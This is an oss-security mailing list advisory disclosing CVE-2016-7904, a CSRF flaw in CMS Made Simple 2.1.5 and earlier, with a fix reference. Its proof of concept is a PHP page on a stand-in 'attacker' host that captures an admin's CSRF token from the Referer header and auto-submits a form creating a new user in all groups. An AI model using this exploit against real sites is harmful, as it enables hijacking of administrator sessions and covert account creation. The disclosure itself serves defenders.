Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 16 Jan 2017 10:17:29 +0800 (GMT+08:00)
From: "Hongkun Zeng" <hongkun.zeng@...ppsecurity.com.cn>
To: oss-security <oss-security@...ts.openwall.com>
Subject: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF

Vulnerability: CVE-2016-7904: CMS Made Simple <= 2.1.5 CSRF
CVE: CVE-2016-7904
Discovered by: Hongkun Zeng (http://www.dbappsecurity.com.cn/)


CMS Made Simple (CMSMS) is a free, open source (GPL) content management system (CMS) to provide developers, programmers and site owners a web-based development and administration area.


This is a security issue in CMSMS. Low privilege users were able to gain control of an administrative session through a CSRF attack.


Add article and insert image with link http://attacker/csrfpoc.php, and the referer would leak the users' csrf token.


POC:
```
//File: csrfpoc.php
<?php
session_start();


if(!isset($_SERVER['HTTP_REFERER']) && !isset($_SESSION['_sk_']))
exit;


if(isset($_SERVER['HTTP_REFERER'])){
$parsed_url = parse_url($_SERVER['HTTP_REFERER']);
$query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : '';
parse_str("$query",$arr);
if(isset($arr['_sk_'])){
$_SESSION['_sk_'] = $arr['_sk_'];
}
}
if(!isset($_SESSION['_sk_']))
exit;
?>


<form action='http://localhost:8012/admin/adduser.php' method='POST' id='form' enctype='multipart/form-data'>
<input type="text" name="_sk_" value="<?php echo $_SESSION['_sk_'];?>" />
<input type="text" name="user" value="test" />
<input type="text" name="password" value="123456" />
<input type="text" name="passwordagain" value="123456" />
<input type="text" name="firstname" value="" />
<input type="text" name="lastname" value="" />
<input type="text" name="email" value="" />
<input type="text" name="active" value="1" />
<input type="text" name="sel_groups[]" value="1" />
<input type="text" name="sel_groups[]" value="2" />
<input type="text" name="sel_groups[]" value="3" />
<input type="text" name="copyusersettings" value="-1" />
<input type="text" name="submit" value="submit" />
</form>
<script> document.createElement('form').submit.call(document.getElementById('form')); </script> 
```


Ref:
http://dev.cmsmadesimple.org/project/changelog/5392


--

Best Regards,
Hongkun Zeng
---------------------------------------------------
hongkun.zeng (at) dbappsecurity.com.cn

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.